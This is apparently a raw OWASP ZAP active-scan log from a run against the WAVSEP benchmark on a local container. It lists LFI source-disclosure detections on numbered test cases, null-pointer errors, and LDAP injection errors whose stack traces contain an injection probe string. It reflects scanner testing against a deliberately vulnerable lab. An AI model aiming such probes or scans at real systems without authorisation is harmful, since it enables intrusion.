[ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10748776 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10748777 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10748973 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10748974 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10748975 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10748975 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10749196 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10749197 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10749843 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10749844 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10749855 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10749856 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10749978 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10749980 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10749980 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10749981 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10750785 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10750786 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10751185 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10751187 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10751406 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10751408 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10752395 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10752396 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10752993 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 0%, compared to a threshold of 75% 10752994 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10754242 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10754246 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10754462 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10754468 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10754536 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-404Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10754537 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10754859 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10754861 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10755055 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10755056 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10755464 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10755465 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10755468 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10755469 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10755658 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10755668 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10755717 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-404Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10755720 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10756294 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10756298 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10756461 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10756462 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10757072 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10757076 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10757464 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10757465 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10757723 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-404Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10757724 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10758680 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10758684 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10759071 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 14%, compared to a threshold of 75% 10759072 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10760352 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case63-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 15%, compared to a threshold of 75% 10760353 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10760377 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 17%, compared to a threshold of 75% 10760377 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10760486 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 15%, compared to a threshold of 75% 10760487 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10760704 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 17%, compared to a threshold of 75% 10760706 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10760891 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 18%, compared to a threshold of 75% 10760892 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10761092 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 15%, compared to a threshold of 75% 10761093 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10761286 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case64-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 15%, compared to a threshold of 75% 10761287 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10761496 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 15%, compared to a threshold of 75% 10761499 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10761752 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 15%, compared to a threshold of 75% 10761754 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10761911 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 18%, compared to a threshold of 75% 10761912 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10762312 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 17%, compared to a threshold of 75% 10762314 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10762514 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 18%, compared to a threshold of 75% 10762516 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10762720 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 15%, compared to a threshold of 75% 10762723 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10762908 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 15%, compared to a threshold of 75% 10762910 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10762969 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 15%, compared to a threshold of 75% 10762970 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10763108 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 15%, compared to a threshold of 75% 10763109 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10763322 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 18%, compared to a threshold of 75% 10763323 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10763536 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 17%, compared to a threshold of 75% 10763537 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10764527 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 15%, compared to a threshold of 75% 10764531 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10764720 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 15%, compared to a threshold of 75% 10764721 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10764984 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 15%, compared to a threshold of 75% 10764985 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10765950 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 18%, compared to a threshold of 75% 10765951 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10766549 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 18%, compared to a threshold of 75% 10766550 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10871036 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case07-Redirect-FalsePositive-LFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 31%, compared to a threshold of 75% 10871037 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10877606 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SourceCodeDisclosureFileInclusion in 152.685s 10877607 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | LDAPInjection strength LOW threshold MEDIUM 10903461 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 10903461 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 10903467 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 10904641 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 10904643 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 10987313 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11004248 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at 